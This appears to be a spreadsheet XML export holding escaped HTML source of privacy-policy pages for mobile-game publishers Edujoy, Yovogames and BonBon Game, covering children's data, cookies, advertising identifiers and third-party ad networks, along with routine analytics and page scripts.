                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt;Child Protection&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt; We do not knowingly contact or do business with children under 13 years of age. If a parent or guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at edujoy@edujoygames.com so that we may rectify the situation.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt;Advertising&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt;Some of our apps contain third-party advertising.</t>
  </si>
  <si>
    <t>We may occasionally promote other products of our own within our apps. We may occasionally cross-promote the products of other affiliated developers that offer similar products and share similar values as expressed on their own published privacy policies.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt; Third-party sites&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt;Our Apps may contain links to third party websites, products, or services.</t>
  </si>
  <si>
    <t>For example, the Apps may feature offers from third party advertisers or the ability to engage in transactions with such entities. Please note that while using such third party offerings, you are using sites, products, and services developed and administered by people or companies not affiliated with or controlled by us. We are not responsible for the actions of those people or companies, the content of their sites, products or services, the use of information you provide to them, or any products or services they may offer.</t>
  </si>
  <si>
    <t>Our link to such third parties does not constitute our sponsorship of, or affiliation with, those people or companies. Nor is such linking an endorsement of such third party’s privacy or information security policies or practices or their compliance with laws. Information collected by third parties, which may include such things as location information or contact details, is governed by their privacy practices.</t>
  </si>
  <si>
    <t>These other websites or services may place their own cookies or other files on your computing device, collect information or solicit personal information from you. We encourage you to learn about the privacy practices of third parties with which you interact. We are not responsible or liable for your interaction with such third parties, the information requests initiated by such third parties, or the subsequent use, treatment or dissemination of information you voluntarily choose to provide to them.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt;Use of the gathered information&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt;EDUJOY is committed to the respect and absolute confidentiality of the personal information of our users that we gather and handle.</t>
  </si>
  <si>
    <t>Most of the information we gather and keep is aimed at improving gaming experience, but it is also used for other purposes such as those related to marketing. EDUJOY uses gathered information to:&lt;/p&gt;_x005F_x000D_
                            &lt;ul&gt;_x005F_x000D_
                                &lt;li&gt;Create, improve, and optimize our apps and user experience.&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;Offer tech support and address user complaints.&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;Collaborate in creating a safer and more reliable environment for our users, to help prevent fraud or potentially illegal acts.&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;Offer contextual advertising suited to the user.&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;Notify about updates or new functionalities available in our website or mobile apps.&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;Send promotional messages about new products or special offers.&lt;/li&gt;_x005F_x000D_
                            &lt;/ul&gt;_x005F_x000D_
                            &lt;p&gt;EDUJOY will preferably send information through email or notifications on its own website, but may use other channels when available (mail, telephone, or any other electronic medium). All promotional messages sent by electronic media will include easy and cost-free information on how to unsubscribe.</t>
  </si>
  <si>
    <t>Requests to unsubscribe will be handled as soon as possible and always within the period established by law.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt;Child security&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt;Under no circumstance will EDUJOY collect sensitive information from children. EDUJOY is not currently collecting any sensitive information from minors and all its mobile apps include strict parental controls in order to protect children from accidental purchases or unwanted publicity.&lt;/p&gt;_x005F_x000D_
                            &lt;p&gt; The only personal data we collect is: cookies, unique device identifiers for advertising (Google advertiser ID or IDFA, for example) and usage data.&lt;/p&gt;_x005F_x000D_
                            &lt;p&gt;</t>
  </si>
  <si>
    <t>We also advise reading this privacy policy since by allowing your children to use our services you are agreeing to this privacy policy on their behalf. If you disagree, please do not allow your child to use our apps.&lt;/p&gt;_x005F_x000D_
                            &lt;p&gt; We do not contact or collect information from children under 13 without the permission of their parents/guardians.</t>
  </si>
  <si>
    <t>However, if you believe that we have inadvertently collected such information, please contact us to promptly obtain the consent of the parents/guardians or erase the information.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt;Cookies&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt; This Application uses cookies to collect data from its Users.&lt;/p&gt;_x005F_x000D_
                            &lt;h3&gt;What are cookies?&lt;/h3&gt;_x005F_x000D_
                             &lt;p&gt;Cookies are small text files that are dropped on a user's web browser or app that the user was viewing.</t>
  </si>
  <si>
    <t>Each cookie contains a small amount of information such as a unique identifier that links a user to a specific website. This allows for a more personalized experience for the user as the browser remembers the user. The information stored in a cookie and it’s ability to track user activity on the web/app has been used by marketers and advertisers to serve more relevant advertisements to users and improve ad effectiveness.&lt;/p&gt;_x005F_x000D_
                            &lt;p&gt;</t>
  </si>
  <si>
    <t>Among the types of Personal Data that this Application collects, by itself or through third parties, there are: Cookies, Usage Data and unique device identifiers for advertising (Google Advertiser ID, for example).&lt;/p&gt;_x005F_x000D_
                            &lt;p&gt;Read our Cookies Policy here: &lt;a href="cookies-policy"&gt;Cookies policy&lt;/a&gt;.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;script type="text/javascript"&gt;let optOutCounter = 0; function setCookie(cname,cvalue,exdays){var d = newDate();d.setTime(d.getTime()+(exdays*24*60*60*1000));varexpires='expires='+d.toUTCString();document.cookie=cname+'='+cvalue+';'+expires+';path=/'; if(optOutCounter==0){ let cookieP = document.getElementById('cookieP'); var successCookie = document.createElement('h2'); successCookie.innerHTML = 'Optout Success!'; successCookie.setAttribute('style','color:green'); cookieP.appendChild(successCookie); optOutCounter ++ } };&lt;/script&gt; &lt;h2&gt;Common ID Cookie&lt;/h2&gt; &lt;p id="cookieP"&gt;This site uses cookies and similar tracking technologies such as the Common ID cookie to provide its services.</t>
  </si>
  <si>
    <t>Cookies are important devices for measuring advertising effectiveness and ensuring a robust online advertising industry. The Common ID cookie stores a unique user id in the first party domain and is accessible to our ad partners. This simple ID that can be utilized to improve user matching, especially for delivering ads to iOS and MacOS browsers.</t>
  </si>
  <si>
    <t>Users can opt out of the Common ID tracking cookie by clicking &lt;a onclick="window.setCookie('_pubcid_optout', '1', 1825);" href="#opt-out"&gt;here&lt;/a&gt;.&lt;/p&gt; &lt;h2&gt; Advertising Privacy Settings&lt;/h2&gt;&lt;p&gt;FOR EU USERS ONLY: When you use our site, pre-selected companies may access and use certain information on your device and about your interests to serve ads or personalized content. You may revisit or change consent-choices at any time by clicking &lt;a href="#cmp" onclick="if(window.__cmp === undefined){console.warn('User is not in the EU - Consent Choices can only be configured when User is in the EU')}else{window.__cmp('showConsentTool')}" &gt;here&lt;/a&gt;.&lt;/p&gt; _x005F_x000D_
_x005F_x000D_
_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;h2&gt;</t>
  </si>
  <si>
    <t>Right of access, rectification, cancellation and objection&lt;/h2&gt;_x005F_x000D_
                            &lt;p&gt;Any user who fills their personal information in the various subscription forms is able to exercise their right of access, rectification, cancellation and objection by request to the mailing address of the owner of the database, Ugasko Bidea, 3bis, 2º, 48014 Bilbao, or by email to edujoy@edujoygames.com. Edujoy may make changes to its Privacy Policy. If these changes affect the rights of the users, they will be notified by email.</t>
  </si>
  <si>
    <t>The updated Privacy Policy into effect is permanently accessible on the website.&lt;/p&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;    _x005F_x000D_
                    _x005F_x000D_
                         _ x000D_
                &lt;/div&gt;            _x005F_x000D_
            &lt;/section&gt;_x005F_x000D_
_x005F_x000D_
        &lt;/main&gt;_x005F_x000D_
_ x000D_
        &lt;footer&gt; _x005F_x000D_
_x005F_x000D_
            &lt;div id="copy"&gt;_x005F_x000D_
                &lt;p&gt;&amp;copy; 2021&lt;/p&gt; _x005F_x000D_
                &lt;img src="img/edujoy_logo_s.png" alt="Edujoy" /&gt;_x005F_x000D_
                &lt;p&gt;by &lt;strong&gt;appquiz&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
            &lt;/div&gt;   _x005F_x000D_
_x005F_x000D_
            &lt;p class="sandboxandco"&gt;Edujoy is part of &lt;a href="https://sandboxandco.com/"&gt;Sandbox &amp; Co.&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
            &lt;p class="privacy"&gt;Read our &lt;a href="privacy_policy"&gt;privacy policy&lt;/a&gt; and &lt;a href="cookies-policy"&gt;cookies policy&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
            _x005F_x000D_
            &lt;div id="social"&gt;_x005F_x000D_
                &lt;a href="https://twitter.com/edujoygames"&gt;&lt;img src="img/twitter.png" alt="Twitter" width="50"/&gt;&lt;/a&gt;_x005F_x000D_
                &lt;a href="https://facebook.com/edujoysl/"&gt;&lt;img src="img/facebook.png" alt="Facebook" width="50"/&gt;&lt;/a&gt;_x005F_x000D_
                &lt;a href="https://www.instagram.com/edujoygames"&gt;&lt;img src="img/instagram.png" alt="Instagram" width="50"/&gt;&lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/footer&gt;_x005F_x000D_
        _ x000D_
    &lt;/div&gt;  _x005F_x000D_
_x005F_x000D_
    _x005F_x000D_
_x005F_x000D_
    &lt;!-- Scripts --&gt;_x005F_x000D_
    &lt;script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/script.min.js"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Analytics --&gt;_x005F_x000D_
    &lt;script&gt;_x005F_x000D_
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){_x005F_x000D_
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');_x005F_x000D_
        ga('create', 'UA-161470386-1', 'auto');_x005F_x000D_
        ga('send', 'pageview');_x005F_x000D_
_x005F_x000D_
    &lt;/script&gt;_x005F_x000D_
 _x005F_x000D_
&lt;/body&gt;_x005F_x000D_
_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
       _x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
          </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="UTF-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
    &lt;title&gt;Yovogames&lt;/title&gt;
    &lt;link rel="preload" href="/distr/css/jquery-confirm.min.css" as="style"&gt;
    &lt;link rel="preload" href="/distr/css/bootstrap.min.css" as="style"&gt;
    &lt;link rel="preload" href="/distr/css/bootstrap-select.min.css" as="style"&gt;
    &lt;link rel="preload" href="/distr/css/nav.css" as="style"&gt;
    &lt;link rel="preload" href="/distr/css/custom2.min.css" as="style"&gt;
    &lt;link rel="preload" href="/distr/js/jquery-1.12.4.js" as="script"&gt;
    &lt;link rel="preload" href="/distr/js/jquery-confirm.min.js" as="script"&gt;
    &lt;link rel="preload" href="/distr/js/bootstrap.min.js" as="script"&gt;
    &lt;link rel="preload" href="/distr/js/select/bootstrap-select.min.js" as="script"&gt;
    &lt;link rel="preload" href="/distr/js/popper.min.js" as="script"&gt;
    &lt;link rel="preload" href="/distr/js/index.min.js" as="script"&gt;
    &lt;link rel="stylesheet" href="/distr/css/bootstrap.min.css"&gt;
    &lt;link rel="stylesheet" href="/distr/css/jquery-confirm.min.css"&gt;
    &lt;link rel="stylesheet" href="/distr/css/nav.css"&gt;
    &lt;link rel="stylesheet" href="/distr/css/custom2.css"&gt;
    &lt;link rel="icon" type="image/png" href="https://yovogames.com/distr/images/logo/favicon.png"&gt;
    &lt;script&gt;
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
                m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-62861681-1', 'auto');
        ga('send', 'pageview');
    &lt;/script&gt;
    &lt;script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"&gt;&lt;/script&gt;
    &lt;script&gt;
        (adsbygoogle = window.adsbygoogle || []).push({
            google_ad_client: "ca-pub-9137844431561838",
            enable_page_level_ads: true
        });
    &lt;/script&gt;
&lt;/head&gt;
&lt;body style="width: 100%; background: url(/distr/images/logo/bg.jpg?v=2) repeat; background-attachment: fixed; background-size: cover;"&gt;
&lt;nav xmlns="http://www.w3.org/1999/html"&gt;
    &lt;div class="topnav"&gt;
        &lt;img src="https://yovogames.com/distr/images/logo/yovo_logo.png"&gt;
        &lt;a id="first" href="/"&gt;Games&lt;/a&gt;
        &lt;a href="/policy"&gt;Policy&lt;/a&gt;
        &lt;a href="/terms"&gt;Terms&lt;/a&gt;
        &lt;a href="/review"&gt;Review&lt;/a&gt;
        &lt;a href="/about"&gt;About&lt;/a&gt;
    &lt;/div&gt;
&lt;/nav&gt;
&lt;div class="panel panel-default" id="1-1"&gt;
    &lt;div class="panel-body"&gt;
        &lt;h2&gt; Privacy Policy&lt;/h2&gt;
        &lt;p&gt;&lt;b&gt;Routine Information Collection&lt;/b&gt;&lt;br&gt;All web servers track basic information about their visitors.</t>
  </si>
  <si>
    <t>This information includes, but is not limited to, IP addresses, browser details, timestamps and referring pages. None of this information can personally identify specific visitors to this site. The information is tracked for routine administration and maintenance purposes, and lets me know what pages and information are useful and helpful to visitors.&lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Cookies and Web Beacons&lt;/b&gt;&lt;br&gt;Where necessary, our apps uses cookies to store information about a visitor’s preferences and history in order to better serve the visitor and/or present the visitor with customized content.</t>
  </si>
  <si>
    <t>Advertising partners and other third parties may also use cookies, scripts and/or web beacons to track visitors to our site in order to display advertisements and other useful information. Such tracking is done directly by the third parties through their own servers and is subject to their own privacy policies.&lt;/p&gt;&gt;
        &lt;p&gt;&lt;b&gt;COPPA&lt;/b&gt;&lt;br&gt;We comply with the Children’s Online Privacy Protection Act. We do not knowingly collect personal information on children under the age of 13.</t>
  </si>
  <si>
    <t>When a user identifies himself or herself as a child under the age of 13 through a support request or through any feedback, we will not collect, store or use, and will delete in a secure manner, any personal information of such user.&lt;/p&gt;
        &lt;p&gt;&lt;b&gt;IN-APP PURCHASES&lt;/b&gt;
            &lt;br&gt;Our Apps enable in-app purchases. We do not process payments for in-app purchases and not have access to your credit card information. Payment transactions for in-app purchases are completed through the app store via your app store account.</t>
  </si>
  <si>
    <t>Any post-purchase processes are controlled by the app store and are subject to specific terms of such app store.&lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Controlling Your Privacy&lt;/b&gt;
            &lt;br&gt;Note that you can change your browser settings to disable cookies if you have privacy concerns. Disabling cookies for all sites is not recommended as it may interfere with your use of some sites. The best option is to disable or enable cookies on a per-site basis.</t>
  </si>
  <si>
    <t>Consult your browser documentation for instructions on how to block cookies and other tracking mechanisms.&lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Information Collection and Use&lt;/b&gt;
            &lt;br&gt;For a better experience, while using our Service, we may require you to provide us with certain personally identifiable information, including but not limited to Advertising ID.&lt;br&gt;
                Advertising ID we use for statistical purposes only(e.t.c. all types of retention, gameplay times and others).&lt;br&gt;
                However, you can disable or reset your ID in a few clicks and go back to being (almost) anonymous. Note: limiting ad tracking settings only work on apps, not for websites you visit via browser.</t>
  </si>
  <si>
    <t>And resetting your ID won’t get rid of ads; they just won’t be personalized because they won’t have your data.&lt;/p&gt;
        &lt;p&gt;&lt;b&gt;How to limit ad tracking on Android devices&lt;/b&gt;
        &lt;ol&gt;
            &lt;li&gt;Go to Settings and scroll down to Google Services &amp; preferences.&lt;/li&gt;
            &lt;li &gt; This will open your Google account.</t>
  </si>
  <si>
    <t>Click on Ads.&lt;/li&gt;
            &lt;li&gt;Now click on Reset advertising ID. Then slide Opt out of Ads personalization to the right to disable Android advertising ID.&lt;/li&gt;
        &lt;/ol&gt;
        &lt;/p&gt;
        &lt;p&gt;&lt;b&gt;How to limit ad tracking on iPhone or iPad&lt;/b&gt;
            &lt;ol&gt;
            &lt;li&gt;Go to Settings and scroll down to Privacy.&lt;/li&gt;
            &lt;li&gt;Click on Advertising.&lt;/li&gt;
            &lt;li&gt;Click Reset Advertising Identifier to clear the data collected about you. Then slide the button to the left right to Limit Ad Tracking to turn it on.&lt;/li&gt;
        &lt;/ol&gt;
        &lt;/p&gt;
        &lt;p&gt;</t>
  </si>
  <si>
    <t>The our apps does use third party services that may collect information used to identify you.&lt;/p&gt;
        &lt;p&gt;Links to privacy policy of third party service providers used by the our apps:&lt;/p&gt;
        &lt;p&gt;Google AdMob &lt;a href="https://policies.google.com/privacy?hl=en" target="_blank"&gt;https://policies.google.com/privacy?hl=en&lt;/a&gt;&lt;br&gt;
            Unity and Unity Analytics &lt;a href="https://unity3d.com/ru/legal/gdpr" target="_blank"&gt;https://unity3d.com/ru/legal/gdpr&lt;/a&gt; and &lt;a href="https://unity3d.com/ru/legal/privacy-policy" target="_blank"&gt;https://unity3d.com/ru/legal/privacy-policy&lt;/a&gt;&lt;br&gt;
            Unity Ads &lt;a href="https://unity3d.com/ru/legal/privacy-policy" target="_blank"&gt;https://unity3d.com/ru/legal/privacy-policy&lt;/a&gt;&lt;br&gt;
            Firebase Analytics &lt;a href="https://firebase.google.com/support/privacy" target="_blank"&gt;https://firebase.google.com/support/privacy&lt;/a&gt; and &lt;a href="https://policies.google.com/privacy" target="_blank"&gt;https://policies.google.com/privacy&lt;/a&gt;&lt;br&gt;
            AppLovin &lt;a href="https://www.applovin.com/privacy/" target="_blank"&gt;https://www.applovin.com/privacy/&lt;/a&gt;&lt;br&gt;
            ChartBoost &lt;a href="https://answers.chartboost.com/en-us/articles/200780269" target="_blank"&gt;https://answers.chartboost.com/en-us/articles/200780269&lt;/a&gt;&lt;br&gt;
            Vungle &lt;a href="http://vungle.com/privacy/" target="_blank"&gt;http://vungle.com/privacy/&lt;/a&gt;&lt;br&gt;
             StartApp &lt;a href="https://www.startapp.com/policy/services-website-privacy/" target="_blank"&gt;https://www.startapp.com/policy/services-website-privacy/&lt;/a&gt;&lt;br&gt;
            Kidoz &lt;a href="https://kidoz.net/website-and-kidoz-sdk-privacy-policy/" target="_blank"&gt;https://kidoz.net/website-and-kidoz-sdk-privacy-policy/&lt;/a&gt;&lt;br&gt;
            AppBrain &lt;a href="https://www.appbrain.com/info/help/privacy/index.html" target="_blank"&gt;https://www.appbrain.com/info/help/privacy/index.html&lt;/a&gt;&lt;br&gt;
            SuperAwesome &lt;a href="https://www.superawesome.com/awesomeads-privacy-policy" target="_blank"&gt;https://www.superawesome.com/awesomeads-privacy-policy&lt;/a&gt;&lt;br&gt;
            InMobi Ads &lt;a href="http://www.inmobi.com/page/opt-out/" target="_blank"&gt;http://www.inmobi.com/page/opt-out/&lt;/a&gt;&lt;br&gt;
            My.com &lt;a href="https://target.my.com/privacy/" target="_blank"&gt;https://target.my.com/privacy/&lt;/a&gt;&lt;br&gt;
            Mobfox &lt;a href="https://www.mobfox.com/privacy-policy/" target="_blank"&gt;https://www.mobfox.com/privacy-policy/&lt;/a&gt;&lt;br&gt;
            Facebook Ads &lt;a href="https://www.facebook.com/settings?tab=ads" target="_blank"&gt;https://www.facebook.com/settings?tab=ads&lt;/a&gt;&lt;br&gt;
            AdColony &lt;a href="https://www.adcolony.com/privacy-policy/" target="_blank"&gt;https://www.adcolony.com/privacy-policy/&lt;/a&gt;&lt;br&gt;
            ironSource &lt;a href="https://www.ironsrc.com/privacy-policy/" target="_blank"&gt;https://www.ironsrc.com/privacy-policy/&lt;/a&gt;&lt;br&gt;
        &lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Service Providers&lt;/b&gt;&lt;br&gt;We may employ third-party companies and individuals due to the following reasons:&lt;/p&gt;
        &lt;ul style="list-style-type: circle;"&gt;
            &lt;li style="float: none"&gt;To facilitate our Service;&lt;/li&gt;
            &lt;li style="float: none"&gt;To provide the Service on our behalf;&lt;/li&gt;
            &lt;li style="float: none"&gt;To perform Service-related services; or&lt;/li&gt;
            &lt;li style="float: none"&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;
        &lt;/ul&gt;
        &lt;p&gt; We want to inform users of this Service that these third parties have access to your Personal Information.</t>
  </si>
  <si>
    <t>The reason is to perform the tasks assigned to them on our behalf. However, they are obligated not to disclose or use the information for any other purpose.&lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Security&lt;/b&gt;&lt;br&gt;
             We value your trust in providing us your Personal Information, thus we are striving to use commercially acceptable means of protecting it.</t>
  </si>
  <si>
    <t>But remember that no method of transmission over the internet, or method of electronic storage is 100% secure and reliable, and we cannot guarantee its absolute security.
         &lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Children’s Privacy&lt;/b&gt;&lt;br&gt;
            These Services do not address anyone under the age of 13. We do not knowingly collect personally identifiable information from children under 13\. In the case we discover that a child under 13 has provided us with personal information, we immediately delete this from our servers.</t>
  </si>
  <si>
    <t>If you are a parent or guardian and you are aware that your child has provided us with personal information, please contact us so that we will be able to do necessary actions.
         &lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Changes to This Privacy Policy&lt;/b&gt;&lt;br&gt;
            We may update our Privacy Policy from time to time. Thus, you are advised to review this page periodically for any changes.</t>
  </si>
  <si>
    <t>We will notify you of any changes by posting the new Privacy Policy on this page.&lt;br&gt;
            This policy is effective as of 2020-07-08
        &lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Contact Us&lt;/b&gt;&lt;br&gt;
            If you have any questions or suggestions about our Privacy Policy, do not hesitate to contact us at &lt;a href="/cdn-cgi/l/email-protection#9ee7f1e8f1f5f7faeddef9f3fff7f2b0fdf1f3"&gt;&lt;span class="__cf_email__" data-cfemail="7b02140d1410121f083b1c161a121755181416"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.
        &lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;
    var height = document.getElementsByClassName("topnav")[0].clientHeight;
    document.getElementById("1-1").style.marginTop = height + "px";
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;!--[if IE 9 ]&gt; &lt;html lang="en-US" class="ie9 loading-site no-js"&gt; &lt;! [endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>IE 8 ]&gt; &lt;html lang="en-US" class="ie8 loading-site no-js"&gt; &lt;! [endif]--&gt;
&lt;!--[if (gte IE 9)|!(IE)]&gt;&lt;!--&gt;
&lt;html class="js" lang="en-US"&gt;&lt;!--&lt;![endif]--&gt;&lt;head&gt;
&lt;meta http-equiv="content-type" content="text/html; charset=UTF-8"&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
	&lt;link rel="pingback" href="http://bonbongame.com/xmlrpc.php"&gt;
	&lt;script&gt;(function(html){html.className =</t>
  </si>
  <si>
    <t>html.className.replace(/\bno-js\b/,'js')})(document.documentElement);&lt;/script&gt;
&lt;title&gt;Privacy Policy – BonBon Game&lt;/title&gt;
&lt;meta name="robots" content="noindex,nofollow"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;&lt;link rel="dns-prefetch" href="http://fonts.googleapis.com/"&gt;
&lt;link rel="dns-prefetch" href="http://s.w.org/"&gt;
&lt;link rel="alternate" type="application/rss+xml" title="BonBon Game » Feed" href="http://bonbongame.com/feed/"&gt;
&lt;link rel="alternate" type="application/rss+xml" title="BonBon Game » Comments Feed" href="http://bonbongame.com/comments/feed/"&gt;
		&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/bonbongame.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&amp;&amp;p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&amp;&amp;(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&amp;&amp;!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o&lt;i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&amp;&amp;t.supports[i[o]],"flag"!==i[o]&amp;&amp;(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&amp;&amp;t.supports[i[o]]);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r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&amp;&amp;r.twemoji&amp;&amp;(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		&lt;/script&gt;&lt;script</t>
  </si>
  <si>
    <t>src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/wp-emoji-release.js" type="text/javascript" defer="defer"&gt;&lt;/script&gt;
		&lt;style type="text/css"&gt;
img.wp-smiley,
img.emoji {
	display: inline ! important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel="stylesheet" id="wp-block-library-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/style_002.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="contact-form-7-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/styles.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="flatsome-icons-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/fl-icons.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="ms-main-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/masterslider.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="ms-custom-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/custom.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="flatsome-main-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/flatsome.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="flatsome-style-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/style.css" type="text/css" media="all"&gt;
&lt;link rel="stylesheet" id="flatsome-googlefonts-css" href="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/css.css" type="text/css" media="all"&gt;
&lt;script type="text/javascript"&gt;(function(a,d){if(a._nsl===d){a._nsl=[];var c=function(){if(a.jQuery===d)setTimeout(c,33);else{for(var b=0;b&lt;a._nsl.length;b++)a._nsl[b].call(a,a.jQuery);a._nsl={push:function(b){b.call(a,a.jQuery)}}}};c()}})(window);&lt;/script&gt;&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/jquery.js" id="jquery-core-js"&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="http://bonbongame.com/wp-json/"&gt;&lt;link rel="alternate" type="application/json" href="http://bonbongame.com/wp-json/wp/v2/pages/1467"&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://bonbongame.com/xmlrpc.php?rsd"&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://bonbongame.com/wp-includes/wlwmanifest.xml"&gt; 
&lt;meta name="generator" content="WordPress 5.5.3"&gt;
&lt;link rel="canonical" href="http://bonbongame.com/privacy-policy/"&gt;
&lt;link rel="shortlink" href="http://bonbongame.com/?p=1467"&gt;
